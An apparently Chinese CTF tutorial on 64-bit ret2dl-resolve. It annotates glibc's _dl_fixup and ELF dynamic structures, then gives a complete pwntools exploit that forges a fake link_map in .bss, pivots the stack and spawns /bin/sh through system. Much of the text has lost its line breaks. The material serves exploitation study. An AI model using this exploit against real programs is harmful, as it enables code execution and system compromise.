// 该结构都有 64 位程序和 32 位程序的区别，不过大致结构相似，此处只讨论 64 位程序中的
// /usr/include/elf.h
typedef struct
{Elf64_Sxword d_tag; /* Dynamic entry type */
// d_tag 识别该结构体表示的哪一个节，通过以此字段不同来寻找不同的节union{Elf64_Xword d_val; /* Integer value */// 对应节的地址，用于存储该结构体表示下的节所在的地址Elf64_Addr d_ptr; /* Address value */} d_un;} Elf64_Dyn;

typedef struct
{Elf64_Word st_name; /* Symbol name (string tbl index) */
// 保存着该函数函数名在 .dynstr 中的偏移，可以结合 .dynstr 找到准确函数名。
unsigned char st_info; /* Symbol type and binding */
unsigned char st_other; /* Symbol visibility */
Elf64_Section st_shndx; /* Section index */
Elf64_Addr st_value; /* Symbol value */
// 如果这个符号被导出，则存有这个导出函数的虚拟地址，否则为NULL.
Elf64_Xword st_size; /* Symbol size */
} Elf64_Sym;

typedef struct {Elf64_Addr r_offset; //保存的是应用重定位操作的偏移量。对于一个重定位文件，这个值是从节开始到受重定位影响的存储单元的偏移量。对于一个可执行或共享目标文件，这个值是受重定位影响的存储单元的虚拟地址。uint64_t   r_info;   //This member gives both the symbol table index with respect to which the relocation must be made and the type of relocation to apply. int64_t    r_addend; //指定了一个附加的常数用来去计算保存在重定位位置的值。} Elf64_Rela;

struct link_map{ElfW(Addr) l_addr;                /* Base address shared object is loaded at.  */char *l_name;                     /* Absolute file name object was found in.  */ElfW(Dyn) *l_ld;                  /* Dynamic section of the shared object.  */struct link_map *l_next, *l_prev; /* Chain of loaded objects.  *///省略，后面还有很多};

#ifdef DL_RO_DYN_SECTION
# define D_PTR(map, i) ((map)->i->d_un.d_ptr + (map)->l_addr)
#else
# define D_PTR(map, i) (map)->i->d_un.d_ptr
#endif

/* We use this macro to refer to ELF macros independent of the nativewordsize.  `ELFW(R_TYPE)' is used in place of `ELF32_R_TYPE' or`ELF64_R_TYPE'.  */
#define ELFW(type)  _ElfW (ELF, __ELF_NATIVE_CLASS, type)

/* Construct a value of type DL_FIXUP_VALUE_TYPE from a code addressand a link map.  */
#define DL_FIXUP_MAKE_VALUE(map, addr) (addr)

/* Calculate the address of symbol REF using the base address from map MAP,if non-NULL.  Don't check for NULL map if MAP_SET is TRUE.  */
#define SYMBOL_ADDRESS(map, ref, map_set)               ((ref) == NULL ? 0                            : (__glibc_unlikely ((ref)->st_shndx == SHN_ABS) ? 0         : LOOKUP_VALUE_ADDRESS (map, map_set)) + (ref)->st_value)

#define LOOKUP_VALUE_ADDRESS(map, set) ((set) || (map) ? (map)->l_addr : 0)

static inline ElfW(Addr)
elf_machine_fixup_plt (struct link_map *map, lookup_t t,const ElfW(Sym) *refsym, const ElfW(Sym) *sym,const ElfW(Rela) *reloc,ElfW(Addr) *reloc_addr, ElfW(Addr) value)
{return *reloc_addr = value;
}

/* The ABI calls for the PLT stubs to pass the index of the relocationand not its offset.  In _dl_profile_fixup and _dl_call_pltexit wealso use the index.  Therefore it is wasteful to compute the offsetin the trampoline just to reverse the operation immediatelyafterwards.  此时的reloc_arg类似于一个数组下标 */
#define reloc_offset reloc_arg * sizeof (PLTREL)
#define reloc_index  reloc_arg#include <elf/dl-runtime.c>

#define ELF64_R_SYM(i)            ((i) >> 32)
#define ELF64_R_TYPE(i)            ((i) & 0xffffffff)/*这里由于我们是64位下的，请看：x86-64下对于reloc_arg的特殊define*/
#ifndef reloc_offset
# define reloc_offset reloc_arg
# define reloc_index  reloc_arg / sizeof (PLTREL)
#endifDL_FIXUP_VALUE_TYPE
attribute_hidden __attribute ((noinline)) ARCH_FIXUP_ATTRIBUTE
_dl_fixup (
# ifdef ELF_MACHINE_RUNTIME_FIXUP_ARGSELF_MACHINE_RUNTIME_FIXUP_ARGS,
# endifstruct link_map *l, ElfW(Word) reloc_arg
){const ElfW(Sym) *const symtab= (const void *) D_PTR (l, l_info[DT_SYMTAB]);  //通过指向linkmap找到DT_SYMTAB，进而得到.dynsym地址，存在symtab里。//查找过程：l -> linkmap -> DT_SYMTAB -> .dynsym//其中l指向linkmap，d_tag类型为DT_SYMTAB时，d_ptr指向.dynsymconst char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]);//拿到.dynstr地址const PLTREL *const reloc= (const void *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);//reloc_offset就是reloc_arg//将.rel.plt地址与reloc_offset相加，得到函数所对应的Elf64_Rel指针，记作reloc const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];//将(reloc->r_info)>>32作为.dynsym下标，得到函数所对应的Elf64_Sym指针，记作symconst ElfW(Sym) *refsym = sym;void *const rel_addr = (void *)(l->l_addr + reloc->r_offset);//l->l_addr 加载共享对象的基本地址//l->l_addr + reloc->r_offset即为需要修改的got表地址。lookup_t result;DL_FIXUP_VALUE_TYPE value;/* Sanity check that we're really looking at a PLT relocation.  *//* 检查r_info最低为是不是7 *//* ELFW(TYPE)是用来代替 Elf32_TYPE 或 Elf64_TYPE*//* ELF_MACHINE_JMP_SLOT=7 有兴趣可以自己看源码在：glibc/latest/source/elf/elf.h */assert (ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT);/* Look up the target symbol.  If the normal lookup rules are notused don't look in the global scope.  */if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0)   //判断(sym->st_other)&0x03是否为0{const struct r_found_version *version = NULL;if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL){const ElfW(Half) *vernum =(const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;    //64位下没法伪造reloc_arg的原因：(reloc->r_info)>>32作为vernum下标取值容易出现非法内存访问//大佬的解释：64位程序bss段被映射到0x600000,我们伪造的.dynsym也在0x600000+,而DT_SYM结构体中的d_ptr还是在0x400000,这就意味着我们的r_info必然很大，再加上数据类型大小的不同，导致(reloc->r_info)>>32作为vernum下标取值时十分容易访问到0x400000和0x600000之间的不可读区域/*#define ELF64_R_SYM(i)            ((i) >> 32)#define ELF64_R_TYPE(i)            ((i) & 0xffffffff)*/version = &l->l_versions[ndx];if (version->hash == 0)version = NULL;}/* We need to keep the scope around so do some locking.  This isnot necessary for objects which cannot be unloaded or whenwe are not using any threads (yet).  */int flags = DL_LOOKUP_ADD_DEPENDENCY;if (!RTLD_SINGLE_THREAD_P){THREAD_GSCOPE_SET_FLAG ();flags |= DL_LOOKUP_GSCOPE_LOCK;}#ifdef RTLD_ENABLE_FOREIGN_CALLRTLD_ENABLE_FOREIGN_CALL;
#endif/* 通过 strtab+sym->st_name 找到函数对应的字符串，result为libc_base */result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope,version, ELF_RTYPE_CLASS_PLT, flags, NULL);/* We are done with the global scope.  */if (!RTLD_SINGLE_THREAD_P)THREAD_GSCOPE_RESET_FLAG ();#ifdef RTLD_FINALIZE_FOREIGN_CALLRTLD_FINALIZE_FOREIGN_CALL;
#endif/* Currently result contains the base load address (or link map)of the object that defines sym.  Now add in the symboloffset.  *//* 函数的真实地址 = libc_base(result) + 偏移地址*/value = DL_FIXUP_MAKE_VALUE (result,SYMBOL_ADDRESS (result, sym, false));}else{/* We already found the symbol.  The module (and therefore its loadaddress) is also known.  */value = DL_FIXUP_MAKE_VALUE (l, SYMBOL_ADDRESS (l, sym, true));result = l;}/* And now perhaps the relocation addend.  */value = elf_machine_plt_value (l, reloc, value);if (sym != NULL&& __builtin_expect (ELFW(ST_TYPE) (sym->st_info) == STT_GNU_IFUNC, 0))value = elf_ifunc_invoke (DL_FIXUP_VALUE_ADDR (value));/* Finally, fix up the plt itself.  */if (__glibc_unlikely (GLRO(dl_bind_not)))return value;/* 将函数的真实地址写入got表对应的表项，value为真实地址、rel_addr为需要写入的got表地址 */return elf_machine_fixup_plt (l, result, refsym, sym, reloc, rel_addr, value);
}

if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL){const ElfW(Half) *vernum =(const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;    //64位下没法伪造reloc_arg的原因：(reloc->r_info)>>32作为vernum下标取值容易出现非法内存访问/*#define ELF64_R_SYM(i)            ((i) >> 32)#define ELF64_R_TYPE(i)            ((i) & 0xffffffff)*/version = &l->l_versions[ndx];if (version->hash == 0)version = NULL;}

mov rax, qword ptr [r10 + 0x1c8]

/* Look up the target symbol.  If the normal lookup rules are notused don't look in the global scope.  */
if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0)//判断(sym->st_other)&0x03是否为0{const struct r_found_version *version = NULL;if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL) //mov rax, qword ptr [r10 + 0x1c8]{/*省略*/}}else{/* We already found the symbol.  The module (and therefore its loadaddress) is also known.  */value = DL_FIXUP_MAKE_VALUE (l, SYMBOL_ADDRESS (l, sym, true));result = l;}

const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];//将(reloc->r_info)>>32作为.dynsym下标，得到函数所对应的Elf64_Sym指针，记作sym

struct link_map{ElfW(Addr) l_addr;                /* Base address shared object is loaded at.  */char *l_name;                     /* Absolute file name object was found in.  */ElfW(Dyn) *l_ld;                  /* Dynamic section of the shared object.  */struct link_map *l_next, *l_prev; /* Chain of loaded objects.  *///......省略一大堆};

# encoding=utf-8
from pwn import *context.log_level='debug'
context.terminal='/bin/zsh'libc = ELF("./libc-2.23.so")
elf = ELF("./ret2-dl")bss = elf.bss()
log.info(".bss :0x%X"%bss)
write_addr = bss+0xac0    # 这里要调试一下，rsp有可能落在非bss上
rbp = write_addr-0x8
fake_link_map_addr = write_addr+0x18
vuln_addr = 0x0000000000400687
pop7ret = 0x000000000040073a
mov3call = 0x0000000000400720
plt_load = 0x4004e6 # jmp
read_got = elf.got['read']# ELF64_sym_size = 0x18
# ELF64_Rela_size = 0x18'''
typedef struct
{Elf64_Word    st_name;        /* Symbol name (string tbl index) */unsigned char    st_info;    /* Symbol type and binding */        unsigned char st_other;        /* Symbol visibility */              Elf64_Section    st_shndx;    /* Section index */                  Elf64_Addr    st_value;        /* Symbol value */                   Elf64_Xword    st_size;        /* Symbol size */
}Elf64_Sym;typedef struct
{Elf64_Addr    r_offset;        /* Address */                         Elf64_Xword    r_info;            /* Relocation type and symbol index */Elf64_Sxword    r_addend;        /* Addend */
}Elf64_Rela;typedef struct
{Elf64_Sxword    d_tag;            /* Dynamic entry type */union{Elf64_Xword d_val;        /* Integer value */Elf64_Addr d_ptr;            /* Address value */} d_un;
}Elf64_Dyn;
'''#fake_Elf64_Dyn_STR_addr = link_map +0x68
#fake_Elf64_Dyn_SYM_addr = link_map +0x70
#fake_Elf64_Dyn_JMPREL_addr = link_map +0xf8def get_fake_link_map(fake_link_map_addr,l_addr,st_value):# 给出各个指针的假地址fake_Elf64_Dyn_STR_addr = p64(fake_link_map_addr)fake_Elf64_Dyn_SYM_addr = p64(fake_link_map_addr + 0x8)fake_Elf64_Dyn_JMPREL_addr = p64(fake_link_map_addr + 0x18)# 伪造相关结构体fake_Elf64_Dyn_SYM = flat(p64(0),p64(st_value-8))fake_Elf64_Dyn_JMPREL = flat(p64(0),p64(fake_link_map_addr+0x28)  )# JMPREL指向.rel.plt地址，放在fake_link_map_addr+0x28r_offset = fake_link_map_addr - l_addrlog.info("r_offset :"+str(hex(r_offset)))fake_Elf64_rela = flat(p64(r_offset),p64(7),p64(0))# fake_link_map整体结构fake_link_map = flat(   # 0x0p64(l_addr),          # 0x8fake_Elf64_Dyn_SYM,   # 0x18fake_Elf64_Dyn_JMPREL,# 0x28fake_Elf64_rela,      # 0x40"x00"*0x28,         # 0x68，下面开始放指针fake_Elf64_Dyn_STR_addr,  # STRTAB指针,0x70fake_Elf64_Dyn_SYM_addr,  # SYMTAB指针,0x78"/bin/shx00".ljust(0x80,"x00"),fake_Elf64_Dyn_JMPREL_addr, # JMPREL指针)return fake_link_mapl_addr = libc.sym['system'] - libc.sym['__libc_start_main'] # l->l_addr设置为 system 与 __libc_start_main 的偏移值,此时__libc_start_main是一个已经解析过的函数
log.info("l_addr :"+str(hex(l_addr)))
log.info("elf.got['__libc_start_main'] :"+str(hex(elf.got['__libc_start_main'])))
log.info("plt_load :"+str(hex(0x4004e6)))
log.info("write_addr :"+str(hex(write_addr)))
#l->l_addr + sym->st_value
# value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
st_value = elf.got['__libc_start_main']
fake_link_map = get_fake_link_map(fake_link_map_addr,l_addr,st_value)io = process("./ret2-dl")# 1. 首先，利用栈迁移，把fake_link_map放在bss段上
rop = flat( 'a'*0x70,  # 此时到达老rbpp64(rbp),p64(pop7ret),p64(0),p64(1),p64(read_got),  # 重新调用read函数  r12p64(len(fake_link_map)+0x18+0x10),   # read读入长度 p64(write_addr),                  # read读入位置  p64(0),                               # p64(mov3call),p64(0)*7 ,                        # 补位p64(vuln_addr)                       # 再返回vuln函数
)
log.info(hex(len(fake_link_map)+0x18+0x10))
io.sendline(rop)        # 此rop中包含了ret2csu，利用其向bss上读数据sleep(1)# 2. 接下来，由于我们在rop中利用ret2csu调用了read函数，我们开始向bss上读数据，以下数据内容是由rop中ret2csu调用的read函数读取的。
fake = flat(p64(plt_load),p64(fake_link_map_addr),p64(0),fake_link_map      # fake_link_map本体
)
log.info(hex(len(fake)))
io.sendline(fake)
attach(io)
pause()
pop_rdi_ret = 0x0000000000400743
leave = 0x4006a6
stack_mig = flat('a'*0x70,p64(rbp),p64(pop_rdi_ret),p64(fake_link_map_addr+0x78), # /bin/shp64(leave)
)
sleep(1)
io.sendline(stack_mig)io.interactive()